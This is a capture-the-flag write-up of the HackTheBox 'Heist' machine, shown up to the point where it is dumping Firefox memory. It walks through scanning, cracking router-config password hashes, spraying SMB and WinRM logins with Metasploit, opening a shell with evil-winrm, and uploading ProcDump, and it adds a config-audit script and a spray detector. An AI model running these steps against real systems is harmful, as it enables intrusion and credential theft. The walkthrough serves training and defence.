

This HackTheBox Heist writeup shows how to solve the Heist machine (a CTF box), which is rated easy (a rating I don't agree with).
CTFs are a great learning platform; don't forget to take notes every time you encounter something new.
As always, I have added the machine's IP to /etc/hosts on my Linux machine as heist.htb.
Step 1 – if you have a host with some IP, nmap it.
Initial nmap scan. We notice two more ports when we scan all 65535 ports with -p-.
┌──(abhinav㉿ETHICALHACKX)-[~/htb]
└─$ nmap heist.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-22 19:51 IST
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.19s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 11.64 seconds

┌──(abhinav㉿ETHICALHACKX)-[~/htb]
└─$ nmap -p- -T5 heist.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-22 19:51 IST
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.18s latency).
Not shown: 65530 filtered ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
49669/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 201.88 seconds
A more detailed nmap scan (service and script scan) against the open ports only:
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ sudo nmap -sV -sC -A -O -p80,135,445,5985,49669 -T5 heist.htb -oA heist.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-22 20:00 IST
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.17s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1m40s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-07-22T14:33:24
|_  start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   173.36 ms 10.10.14.1
2   173.48 ms heist.htb (10.10.10.149)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.43 seconds
Opening the page in a browser takes us to a login page.

Notice the "Login as Guest" functionality? Let's click it.

We can also see an attachment on the page, which contains a router configuration with some password hashes in it:
version 12.2
no service pad
--SNIP--
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
ip ssh version 2
!--SNIP--
transport input ssh
We see three password strings; let's try to recover them.
The first one (the enable secret) can be cracked using john:
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ john hash --wordlist=~/htb/rockyou.txt --rules=Jumbo
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 0.00% (ETA: 2022-02-18 03:36) 0g/s 55508p/s 55508c/s 55508C/s 033192..perlis
stealth1agent    (?)
1g 0:00:00:14 DONE (2021-07-22 22:34) 0.06752g/s 236700p/s 236700c/s 236700C/s stealthy001..ste88dup
Use the "--show" option to display all of the cracked passwords reliably
Session completed
The other two are Cisco type 7 passwords, which are reversible rather than hashed; they can be decoded with a small tool, ciscot7, which can be cloned from GitHub:
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ git clone https://github.com/theevilbit/ciscot7.git
Cloning into 'ciscot7'...
remote: Enumerating objects: 19, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 19 (delta 0), reused 0 (delta 0), pack-reused 15
Receiving objects: 100% (19/19), 6.75 KiB | 2.25 MiB/s, done.
Resolving deltas: 100% (5/5), done.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ cd ciscot7

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/ciscot7]
└─$ ls
ciscot7.py  LICENSE.md  README.md

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/ciscot7]
└─$ python ciscot7.py -p 0242114B0E143F015F5D1E161713
Decrypted password: $uperP@ssword

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/ciscot7]
└─$ python ciscot7.py -p 02375012182C1A1D751618034F36415408
Decrypted password: Q4)sJu\Y8qz*A3?d
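Why ciscot7 works at all is worth seeing in a few lines. The following is an added example, not code from this writeup or from the ciscot7 project: a Cisco type 7 decoder plus a small audit that walks an IOS-style config and rates every credential line by its storage type, so the same check can be run over any backup config before it ends up as an attachment on a support portal. The sample config is constructed from the lines shown in the attachment above, and the key string is Cisco's fixed type 7 key. Note that the second string decodes to Q4)sJu\Y8qz*A3?d, backslash included.

```python
"""Audit a Cisco IOS-style configuration for weak credential storage.

Added example, not code from the writeup or from the ciscot7 tool it uses.
Cisco's type 7 scheme is a fixed-key XOR, so a `password 7` line is
obfuscated, not hashed: anyone who can read the config can read the
password back. The sample config below is constructed from the lines the
writeup's attachment shows.
"""
import re

# The fixed key used by the type 7 transform (publicly documented).
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def decode_type7(encoded: str) -> str:
    """Reverse a type 7 string: two decimal digits give the starting key
    offset, the rest is hex, each byte XORed with the next key byte."""
    if len(encoded) < 4 or len(encoded) % 2 or not encoded[:2].isdigit():
        raise ValueError("not a type 7 string: %r" % encoded)
    seed = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)]
                  for i, b in enumerate(data))
    return plain.decode("ascii")


# Credential lines in IOS syntax: "username NAME [privilege N] password|secret [TYPE] VALUE"
# and "enable password|secret [TYPE] VALUE". A missing TYPE means plaintext (type 0).
CRED_LINE = re.compile(
    r"^(?:username\s+\S+(?:\s+privilege\s+\d+)?|enable)\s+(?:password|secret)"
    r"(?:\s+(?P<type>\d+))?\s+(?P<value>\S+)\s*$"
)

RATING = {
    "0": "plaintext",
    "7": "reversible (type 7 obfuscation; decoded below to prove the point)",
    "5": "weak hash (md5crypt; crackable offline with a wordlist)",
    "8": "acceptable (PBKDF2-SHA256)",
    "9": "acceptable (scrypt)",
}


def audit_config(config: str) -> list:
    """Return one finding per credential line: the line, its storage type,
    a rating, and for type 7 the recovered password."""
    findings = []
    for raw in config.splitlines():
        line = raw.strip()
        m = CRED_LINE.match(line)
        if not m:
            continue
        kind = m.group("type") or "0"
        finding = {"line": line, "type": kind,
                   "rating": RATING.get(kind, "unknown type")}
        if kind == "7":
            finding["recovered"] = decode_type7(m.group("value"))
        findings.append(finding)
    return findings


# Constructed from the attachment shown in the writeup.
SAMPLE_CONFIG = """\
version 12.2
no service pad
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
ip ssh version 2
"""

if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print("type %-2s %s" % (f["type"], f["rating"]))
        print("       ", f["line"])
        if "recovered" in f:
            print("        recovered:", f["recovered"])
```

The lesson for the router owner is in the ratings: type 7 is reversible by design, type 5 is md5crypt that john cracks in seconds from a wordlist, and only type 8 (PBKDF2) and type 9 (scrypt) secrets on current IOS give an offline attacker real work. A minimum password length of 12 does nothing for a password that can simply be read back.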
So far we have three passwords and a few possible (guessed) usernames.
Passwords:
stealth1agent
$uperP@ssword
Q4)sJu\Y8qz*A3?d
Usernames:
rout3r
admin
hazard
crackmapexec can help us test these usernames and passwords against SMB using its shares module.
The same can also be done using Metasploit:
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ sudo msfdb run
[sudo] password for abhinav:
msf6 > creds
Credentials
===========
host  origin  service  public  private  realm  private_type  JtR Format
----  ------  -------  ------  -------  -----  ------------  ----------

msf6 > setg USER_FILE user.txt
USER_FILE => user.txt
msf6 > setg PASS_FILE password.txt
PASS_FILE => password.txt
msf6 > setg RHOSTS heist.htb
RHOSTS => heist.htb
msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > show options

Module options (auxiliary/scanner/smb/smb_login):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   PASS_FILE      password.txt     no        File containing passwords, one per line
   RHOSTS         heist.htb        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The SMB service port (TCP)
   USERPASS_FILE                   no        File containing users and passwords separated by space, one pair per line
   USER_FILE      user.txt         no        File containing usernames, one per line

msf6 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.149:445      - 10.10.10.149:445 - Starting SMB login bruteforce
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:Q4)sJu\Y8qz*A3?d',
[+] 10.10.10.149:445      - 10.10.10.149:445 - Success: '.\hazard:stealth1agent'
[*] heist.htb:445         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) > creds
Credentials
===========
host          origin        service        public  private        realm  private_type  JtR Format
----          ------        -------        ------  -------        -----  ------------  ----------
10.10.10.149  10.10.10.149  445/tcp (smb)  hazard  stealth1agent         Password

msf6 auxiliary(scanner/smb/smb_login) >
Finding more users with Impacket's lookupsid.py, which brute-forces RIDs over the hazard credentials and can reveal more usernames on the machine:
┌──(abhinav㉿ETHICALHACKX)-[/usr/share/doc/python3-impacket/examples]
└─$ python3 lookupsid.py 'hazard:stealth1agent'@heist.htb
Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation

[*] Brute forcing SIDs at heist.htb
[*] StringBinding ncacn_np:heist.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
We get a few more usernames:
support
chase
jason
Let's run the SMB login scanner again with the new usernames added to user.txt:
Module options (auxiliary/scanner/smb/smb_login):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   PASS_FILE      password.txt     no        File containing passwords, one per line
   RHOSTS         heist.htb        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   USERPASS_FILE                   no        File containing users and passwords separated by space, one pair per line
   USER_FILE      user.txt         no        File containing usernames, one per line

msf6 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.149:445      - 10.10.10.149:445 - Starting SMB login bruteforce
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:Q4)sJu\Y8qz*A3?d',
[+] 10.10.10.149:445      - 10.10.10.149:445 - Success: '.\hazard:stealth1agent'
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\support:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\support:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\support:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\chase:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\chase:$uperP@ssword',
[+] 10.10.10.149:445      - 10.10.10.149:445 - Success: '.\chase:Q4)sJu\Y8qz*A3?d'
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\jason:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\jason:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\jason:Q4)sJu\Y8qz*A3?d',
[*] heist.htb:445         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
So we have a new username:password combo, chase:Q4)sJu\Y8qz*A3?d, and we had one more from before, hazard:stealth1agent.
Returning to WinRM and setting the username to chase for another try, we discover we can log in as the chase user:
msf6 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/winrm/winrm_login
msf6 auxiliary(scanner/winrm/winrm_login) > show options

Module options (auxiliary/scanner/winrm/winrm_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DOMAIN            WORKSTATION      yes       The domain to use for Windows authentification
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE         password.txt     no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            heist.htb        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             5985             yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   URI               /wsman           yes       The URI of the WinRM service
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE         user.txt         no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host

msf6 auxiliary(scanner/winrm/winrm_login) > set USERNAME chase
USERNAME => chase
msf6 auxiliary(scanner/winrm/winrm_login) > run

[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\chase:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\chase:$uperP@ssword (Incorrect: )
[+] 10.10.10.149:5985 - Login Successful: WORKSTATION\chase:Q4)sJu\Y8qz*A3?d
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:$uperP@ssword (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:$uperP@ssword (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\support:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\support:$uperP@ssword (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\support:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:$uperP@ssword (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:Q4)sJu\Y8qz*A3?d (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/winrm/winrm_login) >
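Seen from the host's side, the smb_login and winrm_login runs above leave a very recognisable trail: one source address, every known account, the same short password list against each. A per-account lockout threshold never fires at three bad attempts per user, which is exactly why spraying is preferred over brute-forcing a single account. The following is an added example, not code from this writeup or from Metasploit or CrackMapExec: a detector that groups failed logons by source inside a time window and alerts when many distinct accounts each see only a few failures, listing any successes that followed. The records are constructed in the shape of Windows Security events 4625 (failed logon) and 4624 (logon); the field names and the addresses are this example's own, not the real event schema.

```python
"""Flag password spraying in logon events.

Added example, not code from the writeup. A spray is one source failing
against many accounts with few attempts each; per-account lockouts do not
catch it, counting distinct accounts per source does. SAMPLE_EVENTS is
constructed in the shape of Security events 4625/4624 with made-up fields
and addresses.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_EVENTS = [
    # one source, a short password list tried against every known account
    {"time": "2021-07-22T20:05:01", "id": 4625, "user": "rout3r", "src": "10.10.14.5"},
    {"time": "2021-07-22T20:05:02", "id": 4625, "user": "rout3r", "src": "10.10.14.5"},
    {"time": "2021-07-22T20:05:03", "id": 4625, "user": "rout3r", "src": "10.10.14.5"},
    {"time": "2021-07-22T20:05:04", "id": 4625, "user": "admin", "src": "10.10.14.5"},
    {"time": "2021-07-22T20:05:05", "id": 4625, "user": "admin", "src": "10.10.14.5"},
    {"time": "2021-07-22T20:05:06", "id": 4625, "user": "admin", "src": "10.10.14.5"},
    {"time": "2021-07-22T20:05:07", "id": 4624, "user": "hazard", "src": "10.10.14.5"},
    {"time": "2021-07-22T20:05:08", "id": 4625, "user": "support", "src": "10.10.14.5"},
    {"time": "2021-07-22T20:05:09", "id": 4625, "user": "support", "src": "10.10.14.5"},
    {"time": "2021-07-22T20:05:10", "id": 4625, "user": "support", "src": "10.10.14.5"},
    {"time": "2021-07-22T20:05:11", "id": 4625, "user": "chase", "src": "10.10.14.5"},
    {"time": "2021-07-22T20:05:12", "id": 4625, "user": "chase", "src": "10.10.14.5"},
    {"time": "2021-07-22T20:05:13", "id": 4624, "user": "chase", "src": "10.10.14.5"},
    {"time": "2021-07-22T20:05:14", "id": 4625, "user": "jason", "src": "10.10.14.5"},
    {"time": "2021-07-22T20:05:15", "id": 4625, "user": "jason", "src": "10.10.14.5"},
    {"time": "2021-07-22T20:05:16", "id": 4625, "user": "jason", "src": "10.10.14.5"},
    # a user mistyping their own password twice from another host: not a spray
    {"time": "2021-07-22T20:06:00", "id": 4625, "user": "jason", "src": "10.10.14.9"},
    {"time": "2021-07-22T20:06:05", "id": 4625, "user": "jason", "src": "10.10.14.9"},
    {"time": "2021-07-22T20:06:10", "id": 4624, "user": "jason", "src": "10.10.14.9"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def detect_password_spray(events, window=timedelta(minutes=10),
                          min_users=4, max_per_user=3):
    """Return one alert per source whose failed logons, inside any `window`,
    hit at least `min_users` distinct accounts with no account tried more
    than `max_per_user` times. Successful logons from that source during
    or shortly after the burst are listed too: those are the accounts the
    sprayer now holds."""
    by_src = defaultdict(list)
    for e in sorted(events, key=_ts):
        by_src[e["src"]].append(e)

    alerts = []
    for src, evs in by_src.items():
        failures = [e for e in evs if e["id"] == 4625]
        for i, first in enumerate(failures):
            start = _ts(first)
            burst = [f for f in failures[i:] if _ts(f) - start <= window]
            per_user = defaultdict(int)
            for f in burst:
                per_user[f["user"]] += 1
            if len(per_user) < min_users or max(per_user.values()) > max_per_user:
                continue
            end = _ts(burst[-1]) + window
            compromised = sorted({e["user"] for e in evs
                                  if e["id"] == 4624 and start <= _ts(e) <= end})
            alerts.append({"src": src, "first_failure": first["time"],
                           "accounts_tried": len(per_user),
                           "failed_attempts": len(burst),
                           "successes_after": compromised})
            break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_password_spray(SAMPLE_EVENTS):
        print(alert)
```

Tune the thresholds to the environment: the detector deliberately keys on distinct accounts per source rather than failures per account, so a single user fat-fingering a password (the second source in the sample) is left alone, while the 4624 events that follow the burst tell the responder which accounts to reset first.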
We have the chase user, who can connect over WinRM, so let's do it with evil-winrm, a Ruby script you can get from its GitHub repository. Install its dependencies with sudo gem install followed by the space-separated list of gems from its Gemfile, and then run ruby evil-winrm.rb -u chase -p 'Q4)sJu\Y8qz*A3?d' -i heist.htb:
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ git clone https://github.com/Hackplayers/evil-winrm.git
Cloning into 'evil-winrm'...
--SNIP---
Receiving objects: 100% (971/971), 2.01 MiB | 5.91 MiB/s, done.
Resolving deltas: 100% (566/566), done.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist]
└─$ cd evil-winrm

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/evil-winrm]
└─$ ls
CHANGELOG.md  CODE_OF_CONDUCT.md  CONTRIBUTING.md  Dockerfile  evil-winrm.rb  Gemfile  Gemfile.lock  LICENSE  README.md  resources

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/evil-winrm]
└─$ cat Gemfile
source 'https://rubygems.org'

gem 'winrm'
gem 'winrm-fs'
gem 'stringio'
gem 'logger'
gem 'fileutils'

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/evil-winrm]
└─$ sudo gem install winrm winrm-fs stringio logger fileutils
[sudo] password for abhinav:
Fetching nori-2.6.0.gem
Fetching gssapi-1.3.1.gem
Fetching logging-2.3.0.gem
Fetching winrm-2.3.6.gem
--SNIP---
13 gems installed

┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/evil-winrm]
└─$ ruby evil-winrm.rb -u chase -p 'Q4)sJu\Y8qz*A3?d' -i heist.htb

Evil-WinRM shell v3.0

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents>
As usual, we check the Desktop for the user flag:
*Evil-WinRM* PS C:\Users\Chase> gci -recurse . | select fullname

FullName
--------
C:\Users\Chase\3D Objects
C:\Users\Chase\Contacts
C:\Users\Chase\Desktop
C:\Users\Chase\Documents
C:\Users\Chase\Downloads
C:\Users\Chase\Favorites
C:\Users\Chase\Links
C:\Users\Chase\Music
C:\Users\Chase\Pictures
C:\Users\Chase\Saved Games
C:\Users\Chase\Searches
C:\Users\Chase\Videos
C:\Users\Chase\Desktop\todo.txt
C:\Users\Chase\Desktop\user.txt
C:\Users\Chase\Downloads\VMware-tools-11.2.5-17337674-x86_64.exe
C:\Users\Chase\Favorites\Links
C:\Users\Chase\Favorites\Bing.url
C:\Users\Chase\Links\Desktop.lnk
C:\Users\Chase\Links\Downloads.lnk

*Evil-WinRM* PS C:\Users\Chase> cd desktop
*Evil-WinRM* PS C:\Users\Chase\desktop> ls

    Directory: C:\Users\Chase\desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:08 AM            121 todo.txt
-a----        4/22/2019   9:07 AM             32 user.txt

*Evil-WinRM* PS C:\Users\Chase\desktop> type user.txt
a127daef77ab6d9d92008653295f59c4
*Evil-WinRM* PS C:\Users\Chase\desktop> type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.
*Evil-WinRM* PS C:\Users\Chase\desktop>
Poking around the other user directories, inetpub and so on doesn't turn up anything useful, since we have no write access there.
However, Firefox can be seen in the Program Files directory, so we also look at the running processes, which show several entries for firefox:
*Evil-WinRM* PS C:\Users\Chase> cd ../..
*Evil-WinRM* PS C:\> gci

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        4/21/2019   5:33 PM                inetpub
d-----        9/15/2018  12:49 PM                PerfLogs
d-r---        2/18/2021   4:17 PM                Program Files
d-----        4/22/2019   6:56 AM                Program Files (x86)
d-r---        4/22/2019   7:26 AM                Users
d-----        2/18/2021   4:06 PM                Windows

*Evil-WinRM* PS C:\> cd 'program files'
*Evil-WinRM* PS C:\program files> gci

    Directory: C:\program files

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        4/21/2019   9:39 AM                Common Files
d-----        4/21/2019  11:00 AM                internet explorer
d-----        2/18/2021   4:21 PM                Mozilla Firefox
d-----        4/22/2019   6:47 AM                PHP
d-----        4/22/2019   6:46 AM                Reference Assemblies
d-----        4/22/2019   6:46 AM                runphp
d-----        2/18/2021   4:05 PM                VMware
d-r---        4/21/2019  11:00 AM                Windows Defender
d-----        4/21/2019  11:00 AM                Windows Defender Advanced Threat Protection
d-----        9/15/2018  12:49 PM                Windows Mail
d-----        4/21/2019  11:00 AM                Windows Media Player
d-----        9/15/2018  12:49 PM                Windows Multimedia Platform
d-----        9/15/2018  12:58 PM                windows nt
d-----        4/21/2019  11:00 AM                Windows Photo Viewer
d-----        9/15/2018  12:49 PM                Windows Portable Devices
d-----        9/15/2018  12:49 PM                Windows Security
d-----        9/15/2018  12:49 PM                WindowsPowerShell

*Evil-WinRM* PS C:\program files> Get-Process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    468      18     2264       5400               372   0 csrss
---SNIP---
   1077      73   172240     248556       6.70   6184   1 firefox
    347      20     9912      34732       0.22   6300   1 firefox
    401      35    40716     104456       1.09   6436   1 firefox
    378      28    25040      62648       1.09   6752   1 firefox
    355      25    16324      38932       0.11   6964   1 firefox
----SNIP
   1312      27    69108      86932       1.08    968   0 wsmprovhost

*Evil-WinRM* PS C:\program files>
Let us dump the memory of the firefox processes by PID using ProcDump from Microsoft's Sysinternals suite.
First upload procdump64.exe to a writable directory (chase's desktop will do):
*Evil-WinRM* PS C:\program files> cd 'C:/users/chase/desktop'
*Evil-WinRM* PS C:\users\chase\desktop> upload /home/abhinav/htb/heist/SysinternalsSuite/procdump64.exe
Info: Uploading /home/abhinav/htb/heist/SysinternalsSuite/procdump64.exe to C:\users\chase\desktop\procdump64.exe

Data: 535048 bytes of 535048 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\users\chase\desktop> gci

    Directory: C:\users\chase\desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/29/2021   1:17 AM         401288 procdump64.exe
-a----        4/22/2019   9:08 AM            121 todo.txt
-a----        4/22/2019   9:07 AM             32 user.txt

*Evil-WinRM* PS C:\users\chase\desktop> ./procdump64.exe -accepteula
Let's dump the firefox processes one at a time with ./procdump64.exe -ma <process id> (-ma writes a full dump, not just the minidump). Don't forget to accept the EULA first with ./procdump64.exe -accepteula, as shown above.
*Evil-WinRM* PS C:\users\chase\desktop> ./procdump64.exe -ma 6184

ProcDump v10.1 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[01:22:00] Dump 1 initiated: C:\users\chase\desktop\firefox.exe_210729_012200.dmp
[01:22:01] Dump 1 writing: Estimated dump file size is 529 MB.
[01:22:02] Dump 1 complete: 529 MB written in 1.4 seconds
[01:22:02] Dump count reached.

*Evil-WinRM* PS C:\users\chase\desktop> ./procdump64.exe -ma 6300

ProcDump v10.1 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[01:22:20] Dump 1 initiated: C:\users\chase\desktop\firefox.exe_210729_012220.dmp
[01:22:20] Dump 1 writing: Estimated dump file size is 293 MB.
[01:22:20] Dump 1 complete: 293 MB written in 0.4 seconds
[01:22:21] Dump count reached.

*Evil-WinRM* PS C:\users\chase\desktop> ./procdump64.exe -ma 6436

ProcDump v10.1 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[01:22:32] Dump 1 initiated: C:\users\chase\desktop\firefox.exe_210729_012232.dmp
[01:22:32] Dump 1 writing: Estimated dump file size is 350 MB.
[01:22:33] Dump 1 complete: 350 MB written in 0.5 seconds
[01:22:33] Dump count reached.

*Evil-WinRM* PS C:\users\chase\desktop> ./procdump64.exe -ma 6752

